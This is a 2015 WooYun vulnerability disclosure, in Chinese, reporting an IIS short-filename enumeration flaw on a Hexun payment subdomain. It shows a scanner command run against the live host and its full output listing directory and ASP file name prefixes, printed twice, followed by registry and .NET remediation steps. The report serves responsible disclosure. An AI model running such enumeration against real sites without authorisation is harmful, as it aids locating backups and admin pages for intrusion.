当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115841

漏洞标题:和讯网某站短文件名漏洞

相关厂商:和讯网

漏洞作者: 0c0c0f

提交时间:2015-05-25 16:41

修复时间:2015-07-09 16:44

公开时间:2015-07-09 16:44

漏洞类型:系统/服务补丁不及时

危害等级:低

自评Rank:2

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-25: 细节已通知厂商并且等待厂商处理中
2015-05-25: 厂商已经确认,细节仅向厂商公开
2015-06-04: 细节向核心白帽子及相关领域专家公开
2015-06-14: 细节向普通白帽子公开
2015-06-24: 细节向实习白帽子公开
2015-07-09: 细节向公众公开

简要描述:

这个漏洞的意义何在:
猜解后台地址
猜解敏感文件,例如备份的rar、zip、.bak、.SQL文件等。
在某些情形下,甚至可以通过短文件名web直接下载对应的文件。比如下载备份SQL文件。

详细说明:

以下域名存在iis短文件名漏洞
http://mpay.hexun.com/
证明如下:
[root@pentest IIS_shortname_Scanner]# python iis_shortname_Scan.py http://mpay.hexun.com/
server is vulerable, please wait, scanning...
Found /i**** [scan in progress]
Found /a**** [scan in progress]
Found /c**** [scan in progress]
Found /e**** [scan in progress]
Found /m**** [scan in progress]
Found /k**** [scan in progress]
Found /p**** [scan in progress]
Found /n**** [scan in progress]
Found /r**** [scan in progress]
Found /s**** [scan in progress]
Found /t**** [scan in progress]
Found /u**** [scan in progress]
Found /w**** [scan in progress]
Found /z**** [scan in progress]
Found /in**** [scan in progress]
Found /as**** [scan in progress]
Found /ce**** [scan in progress]
Found /ex**** [scan in progress]
Found /me**** [scan in progress]
Found /mo**** [scan in progress]
Found /kq**** [scan in progress]
Found /pa**** [scan in progress]
Found /po**** [scan in progress]
Found /pr**** [scan in progress]
Found /no**** [scan in progress]
Found /re**** [scan in progress]
Found /sh**** [scan in progress]
Found /st**** [scan in progress]
Found /su**** [scan in progress]
Found /sz**** [scan in progress]
Found /te**** [scan in progress]
Found /um**** [scan in progress]
Found /we**** [scan in progress]
Found /zf**** [scan in progress]
Found /inq**** [scan in progress]
Found /int**** [scan in progress]
Found /asp**** [scan in progress]
Found /cer**** [scan in progress]
Found /exc**** [scan in progress]
Found /mes**** [scan in progress]
Found /mer**** [scan in progress]
Found /mon**** [scan in progress]
Found /kqt**** [scan in progress]
Found /pay**** [scan in progress]
Found /pos**** [scan in progress]
Found /pre**** [scan in progress]
Found /not**** [scan in progress]
Found /rem**** [scan in progress]
Found /she**** [scan in progress]
Found /sta**** [scan in progress]
Found /suc**** [scan in progress]
Found /szf**** [scan in progress]
Found /tes**** [scan in progress]
Found /ump**** [scan in progress]
Found /web**** [scan in progress]
Found /zfb**** [scan in progress]
Found /inqu**** [scan in progress]
Found /inte**** [scan in progress]
Found /aspn**** [scan in progress]
Found /cert**** [scan in progress]
Found /exce**** [scan in progress]
Found /mess**** [scan in progress]
Found /merc**** [scan in progress]
Found /mone**** [scan in progress]
Found /kqto**** [scan in progress]
Found /payt**** [scan in progress]
Found /post**** [scan in progress]
Found /prec**** [scan in progress]
Found /noti**** [scan in progress]
Found /remi**** [scan in progress]
Found /shen**** [scan in progress]
Found /star**** [scan in progress]
Found /succ**** [scan in progress]
Found /szft**** [scan in progress]
Found /szf_**** [scan in progress]
Found /test**** [scan in progress]
Found /umpa**** [scan in progress]
Found /zfbt**** [scan in progress]
Found /inqui**** [scan in progress]
Found /inter**** [scan in progress]
Found /aspne**** [scan in progress]
Found /certi**** [scan in progress]
Found /excel**** [scan in progress]
Found /messa**** [scan in progress]
Found /merch**** [scan in progress]
Found /money**** [scan in progress]
Found /kqtoh**** [scan in progress]
Found /payto**** [scan in progress]
Found /post_**** [scan in progress]
Found /preco**** [scan in progress]
Found /notif**** [scan in progress]
Found /remit**** [scan in progress]
Found /shenz**** [scan in progress]
Found /start**** [scan in progress]
Found /succe**** [scan in progress]
Found /szfto**** [scan in progress]
Found /szf_s**** [scan in progress]
Found /test2**** [scan in progress]
Found /umpay**** [scan in progress]
Found /zfbto**** [scan in progress]
Found /inquir**** [scan in progress]
Found /interf**** [scan in progress]
Found /aspnet**** [scan in progress]
Found /certif**** [scan in progress]
Found /excelf**** [scan in progress]
Found /messag**** [scan in progress]
Found /merchb**** [scan in progress]
Found /moneyo**** [scan in progress]
Found /kqtohx**** [scan in progress]
Found /post_r**** [scan in progress]
Found /precom**** [scan in progress]
Found /notify**** [scan in progress]
Found /remiti**** [scan in progress]
Found /shenzh**** [scan in progress]
Found /startp**** [scan in progress]
Found /succes**** [scan in progress]
Found /szftoh**** [scan in progress]
Found /szf_su**** [scan in progress]
Found /umpay_**** [scan in progress]
Found /zfbtoh**** [scan in progress]
Found /inquir*a** [scan in progress]
Found /inquir*p** [scan in progress]
Found /inquir*s** [scan in progress]
Found /interf [scan in progress]
Found Dir /interf~1 [Done]
Found /aspnet [scan in progress]
Found Dir /aspnet~1 [Done]
Found /certif [scan in progress]
Found Dir /certif~1 [Done]
Found /excelf [scan in progress]
Found Dir /excelf~1 [Done]
Found /messag*h** [scan in progress]
Found /messag*m** [scan in progress]
Found /messag*t** [scan in progress]
Found /merchb [scan in progress]
Found Dir /merchb~1 [Done]
Found /moneyo [scan in progress]
Found Dir /moneyo~1 [Done]
Found /kqtohx*a** [scan in progress]
Found /kqtohx*p** [scan in progress]
Found /kqtohx*s** [scan in progress]
Found /post_r*a** [scan in progress]
Found /post_r*p** [scan in progress]
Found /post_r*s** [scan in progress]
Found /precom*c** [scan in progress]
Found /precom*n** [scan in progress]
Found /precom*o** [scan in progress]
Found /notify*a** [scan in progress]
Found /notify*p** [scan in progress]
Found /notify*s** [scan in progress]
Found /remiti*a** [scan in progress]
Found /remiti*p** [scan in progress]
Found /remiti*s** [scan in progress]
Found /startp*a** [scan in progress]
Found /shenzh [scan in progress]
Found Dir /shenzh~1 [Done]
Found /startp*s** [scan in progress]
Found /startp*p** [scan in progress]
Found /succes*a** [scan in progress]
Found /succes*h** [scan in progress]
Found /succes*m** [scan in progress]
Found /succes*p** [scan in progress]
Found /succes*t** [scan in progress]
Found /succes*s** [scan in progress]
Found /szftoh*a** [scan in progress]
Found /szftoh*p** [scan in progress]
Found /szftoh*s** [scan in progress]
Found /szf_su*a** [scan in progress]
Found /szf_su*p** [scan in progress]
Found /szf_su*s** [scan in progress]
Found /umpay_*a** [scan in progress]
Found /umpay_*p** [scan in progress]
Found /umpay_*s** [scan in progress]
Found /zfbtoh*a** [scan in progress]
Found /zfbtoh*p** [scan in progress]
Found /zfbtoh*s** [scan in progress]
Found /inquir*as* [scan in progress]
Found /inquir*sp* [scan in progress]
Found /messag*ht* [scan in progress]
Found /messag*tm* [scan in progress]
Found /kqtohx*as* [scan in progress]
Found /kqtohx*sp* [scan in progress]
Found /post_r*as* [scan in progress]
Found /post_r*sp* [scan in progress]
Found /precom*co* [scan in progress]
Found /precom*on* [scan in progress]
Found /notify*as* [scan in progress]
Found /notify*sp* [scan in progress]
Found /remiti*as* [scan in progress]
Found /remiti*sp* [scan in progress]
Found /startp*as* [scan in progress]
Found /startp*sp* [scan in progress]
Found /succes*as* [scan in progress]
Found /succes*ht* [scan in progress]
Found /succes*tm* [scan in progress]
Found /succes*sp* [scan in progress]
Found /szftoh*as* [scan in progress]
Found /szftoh*sp* [scan in progress]
Found /szf_su*as* [scan in progress]
Found /szf_su*sp* [scan in progress]
Found /umpay_*as* [scan in progress]
Found /umpay_*sp* [scan in progress]
Found /zfbtoh*as* [scan in progress]
Found /zfbtoh*sp* [scan in progress]
Found /inquir*asp [scan in progress]
Found File /inquir~1.asp [Done]
Found /messag*htm [scan in progress]
Found File /messag~1.htm [Done]
Found /kqtohx*asp [scan in progress]
Found File /kqtohx~1.asp [Done]
Found /post_r*asp [scan in progress]
Found File /post_r~1.asp [Done]
Found /precom*con [scan in progress]
Found File /precom~1.con [Done]
Found /notify*asp [scan in progress]
Found File /notify~1.asp [Done]
Found /remiti*asp [scan in progress]
Found File /remiti~1.asp [Done]
Found /startp*asp [scan in progress]
Found File /startp~1.asp [Done]
Found /succes*asp [scan in progress]
Found File /succes~1.asp [Done]
Found /succes*htm [scan in progress]
Found File /succes~1.htm [Done]
Found /szftoh*asp [scan in progress]
Found File /szftoh~1.asp [Done]
Found /szf_su*asp [scan in progress]
Found File /szf_su~1.asp [Done]
Found /umpay_*asp [scan in progress]
Found File /umpay_~1.asp [Done]
Found /zfbtoh*asp [scan in progress]
Found File /zfbtoh~1.asp [Done]
----------------------------------------------------------------
Dir: /interf~1
Dir: /aspnet~1
Dir: /certif~1
Dir: /excelf~1
Dir: /merchb~1
Dir: /moneyo~1
Dir: /shenzh~1
File: /inquir~1.asp
File: /messag~1.htm
File: /kqtohx~1.asp
File: /post_r~1.asp
File: /precom~1.con
File: /notify~1.asp
File: /remiti~1.asp
File: /startp~1.asp
File: /succes~1.asp
File: /succes~1.htm
File: /szftoh~1.asp
File: /szf_su~1.asp
File: /umpay_~1.asp
File: /zfbtoh~1.asp
----------------------------------------------------------------
7 Directories, 14 Files found in toal

漏洞证明:

证明如下:
[root@pentest IIS_shortname_Scanner]# python iis_shortname_Scan.py http://mpay.hexun.com/
server is vulerable, please wait, scanning...
Found /i**** [scan in progress]
Found /a**** [scan in progress]
Found /c**** [scan in progress]
Found /e**** [scan in progress]
Found /m**** [scan in progress]
Found /k**** [scan in progress]
Found /p**** [scan in progress]
Found /n**** [scan in progress]
Found /r**** [scan in progress]
Found /s**** [scan in progress]
Found /t**** [scan in progress]
Found /u**** [scan in progress]
Found /w**** [scan in progress]
Found /z**** [scan in progress]
Found /in**** [scan in progress]
Found /as**** [scan in progress]
Found /ce**** [scan in progress]
Found /ex**** [scan in progress]
Found /me**** [scan in progress]
Found /mo**** [scan in progress]
Found /kq**** [scan in progress]
Found /pa**** [scan in progress]
Found /po**** [scan in progress]
Found /pr**** [scan in progress]
Found /no**** [scan in progress]
Found /re**** [scan in progress]
Found /sh**** [scan in progress]
Found /st**** [scan in progress]
Found /su**** [scan in progress]
Found /sz**** [scan in progress]
Found /te**** [scan in progress]
Found /um**** [scan in progress]
Found /we**** [scan in progress]
Found /zf**** [scan in progress]
Found /inq**** [scan in progress]
Found /int**** [scan in progress]
Found /asp**** [scan in progress]
Found /cer**** [scan in progress]
Found /exc**** [scan in progress]
Found /mes**** [scan in progress]
Found /mer**** [scan in progress]
Found /mon**** [scan in progress]
Found /kqt**** [scan in progress]
Found /pay**** [scan in progress]
Found /pos**** [scan in progress]
Found /pre**** [scan in progress]
Found /not**** [scan in progress]
Found /rem**** [scan in progress]
Found /she**** [scan in progress]
Found /sta**** [scan in progress]
Found /suc**** [scan in progress]
Found /szf**** [scan in progress]
Found /tes**** [scan in progress]
Found /ump**** [scan in progress]
Found /web**** [scan in progress]
Found /zfb**** [scan in progress]
Found /inqu**** [scan in progress]
Found /inte**** [scan in progress]
Found /aspn**** [scan in progress]
Found /cert**** [scan in progress]
Found /exce**** [scan in progress]
Found /mess**** [scan in progress]
Found /merc**** [scan in progress]
Found /mone**** [scan in progress]
Found /kqto**** [scan in progress]
Found /payt**** [scan in progress]
Found /post**** [scan in progress]
Found /prec**** [scan in progress]
Found /noti**** [scan in progress]
Found /remi**** [scan in progress]
Found /shen**** [scan in progress]
Found /star**** [scan in progress]
Found /succ**** [scan in progress]
Found /szft**** [scan in progress]
Found /szf_**** [scan in progress]
Found /test**** [scan in progress]
Found /umpa**** [scan in progress]
Found /zfbt**** [scan in progress]
Found /inqui**** [scan in progress]
Found /inter**** [scan in progress]
Found /aspne**** [scan in progress]
Found /certi**** [scan in progress]
Found /excel**** [scan in progress]
Found /messa**** [scan in progress]
Found /merch**** [scan in progress]
Found /money**** [scan in progress]
Found /kqtoh**** [scan in progress]
Found /payto**** [scan in progress]
Found /post_**** [scan in progress]
Found /preco**** [scan in progress]
Found /notif**** [scan in progress]
Found /remit**** [scan in progress]
Found /shenz**** [scan in progress]
Found /start**** [scan in progress]
Found /succe**** [scan in progress]
Found /szfto**** [scan in progress]
Found /szf_s**** [scan in progress]
Found /test2**** [scan in progress]
Found /umpay**** [scan in progress]
Found /zfbto**** [scan in progress]
Found /inquir**** [scan in progress]
Found /interf**** [scan in progress]
Found /aspnet**** [scan in progress]
Found /certif**** [scan in progress]
Found /excelf**** [scan in progress]
Found /messag**** [scan in progress]
Found /merchb**** [scan in progress]
Found /moneyo**** [scan in progress]
Found /kqtohx**** [scan in progress]
Found /post_r**** [scan in progress]
Found /precom**** [scan in progress]
Found /notify**** [scan in progress]
Found /remiti**** [scan in progress]
Found /shenzh**** [scan in progress]
Found /startp**** [scan in progress]
Found /succes**** [scan in progress]
Found /szftoh**** [scan in progress]
Found /szf_su**** [scan in progress]
Found /umpay_**** [scan in progress]
Found /zfbtoh**** [scan in progress]
Found /inquir*a** [scan in progress]
Found /inquir*p** [scan in progress]
Found /inquir*s** [scan in progress]
Found /interf [scan in progress]
Found Dir /interf~1 [Done]
Found /aspnet [scan in progress]
Found Dir /aspnet~1 [Done]
Found /certif [scan in progress]
Found Dir /certif~1 [Done]
Found /excelf [scan in progress]
Found Dir /excelf~1 [Done]
Found /messag*h** [scan in progress]
Found /messag*m** [scan in progress]
Found /messag*t** [scan in progress]
Found /merchb [scan in progress]
Found Dir /merchb~1 [Done]
Found /moneyo [scan in progress]
Found Dir /moneyo~1 [Done]
Found /kqtohx*a** [scan in progress]
Found /kqtohx*p** [scan in progress]
Found /kqtohx*s** [scan in progress]
Found /post_r*a** [scan in progress]
Found /post_r*p** [scan in progress]
Found /post_r*s** [scan in progress]
Found /precom*c** [scan in progress]
Found /precom*n** [scan in progress]
Found /precom*o** [scan in progress]
Found /notify*a** [scan in progress]
Found /notify*p** [scan in progress]
Found /notify*s** [scan in progress]
Found /remiti*a** [scan in progress]
Found /remiti*p** [scan in progress]
Found /remiti*s** [scan in progress]
Found /startp*a** [scan in progress]
Found /shenzh [scan in progress]
Found Dir /shenzh~1 [Done]
Found /startp*s** [scan in progress]
Found /startp*p** [scan in progress]
Found /succes*a** [scan in progress]
Found /succes*h** [scan in progress]
Found /succes*m** [scan in progress]
Found /succes*p** [scan in progress]
Found /succes*t** [scan in progress]
Found /succes*s** [scan in progress]
Found /szftoh*a** [scan in progress]
Found /szftoh*p** [scan in progress]
Found /szftoh*s** [scan in progress]
Found /szf_su*a** [scan in progress]
Found /szf_su*p** [scan in progress]
Found /szf_su*s** [scan in progress]
Found /umpay_*a** [scan in progress]
Found /umpay_*p** [scan in progress]
Found /umpay_*s** [scan in progress]
Found /zfbtoh*a** [scan in progress]
Found /zfbtoh*p** [scan in progress]
Found /zfbtoh*s** [scan in progress]
Found /inquir*as* [scan in progress]
Found /inquir*sp* [scan in progress]
Found /messag*ht* [scan in progress]
Found /messag*tm* [scan in progress]
Found /kqtohx*as* [scan in progress]
Found /kqtohx*sp* [scan in progress]
Found /post_r*as* [scan in progress]
Found /post_r*sp* [scan in progress]
Found /precom*co* [scan in progress]
Found /precom*on* [scan in progress]
Found /notify*as* [scan in progress]
Found /notify*sp* [scan in progress]
Found /remiti*as* [scan in progress]
Found /remiti*sp* [scan in progress]
Found /startp*as* [scan in progress]
Found /startp*sp* [scan in progress]
Found /succes*as* [scan in progress]
Found /succes*ht* [scan in progress]
Found /succes*tm* [scan in progress]
Found /succes*sp* [scan in progress]
Found /szftoh*as* [scan in progress]
Found /szftoh*sp* [scan in progress]
Found /szf_su*as* [scan in progress]
Found /szf_su*sp* [scan in progress]
Found /umpay_*as* [scan in progress]
Found /umpay_*sp* [scan in progress]
Found /zfbtoh*as* [scan in progress]
Found /zfbtoh*sp* [scan in progress]
Found /inquir*asp [scan in progress]
Found File /inquir~1.asp [Done]
Found /messag*htm [scan in progress]
Found File /messag~1.htm [Done]
Found /kqtohx*asp [scan in progress]
Found File /kqtohx~1.asp [Done]
Found /post_r*asp [scan in progress]
Found File /post_r~1.asp [Done]
Found /precom*con [scan in progress]
Found File /precom~1.con [Done]
Found /notify*asp [scan in progress]
Found File /notify~1.asp [Done]
Found /remiti*asp [scan in progress]
Found File /remiti~1.asp [Done]
Found /startp*asp [scan in progress]
Found File /startp~1.asp [Done]
Found /succes*asp [scan in progress]
Found File /succes~1.asp [Done]
Found /succes*htm [scan in progress]
Found File /succes~1.htm [Done]
Found /szftoh*asp [scan in progress]
Found File /szftoh~1.asp [Done]
Found /szf_su*asp [scan in progress]
Found File /szf_su~1.asp [Done]
Found /umpay_*asp [scan in progress]
Found File /umpay_~1.asp [Done]
Found /zfbtoh*asp [scan in progress]
Found File /zfbtoh~1.asp [Done]
----------------------------------------------------------------
Dir: /interf~1
Dir: /aspnet~1
Dir: /certif~1
Dir: /excelf~1
Dir: /merchb~1
Dir: /moneyo~1
Dir: /shenzh~1
File: /inquir~1.asp
File: /messag~1.htm
File: /kqtohx~1.asp
File: /post_r~1.asp
File: /precom~1.con
File: /notify~1.asp
File: /remiti~1.asp
File: /startp~1.asp
File: /succes~1.asp
File: /succes~1.htm
File: /szftoh~1.asp
File: /szf_su~1.asp
File: /umpay_~1.asp
File: /zfbtoh~1.asp
----------------------------------------------------------------
7 Directories, 14 Files found in toal

修复方案:

1) 升级.net framework
2) 修改注册表键值:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem
修改NtfsDisable8dot3NameCreation为1。

版权声明:转载请注明来源 0c0c0f@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-05-25 16:42

厂商回复:

处理中

最新状态:

暂无


漏洞评价:

评论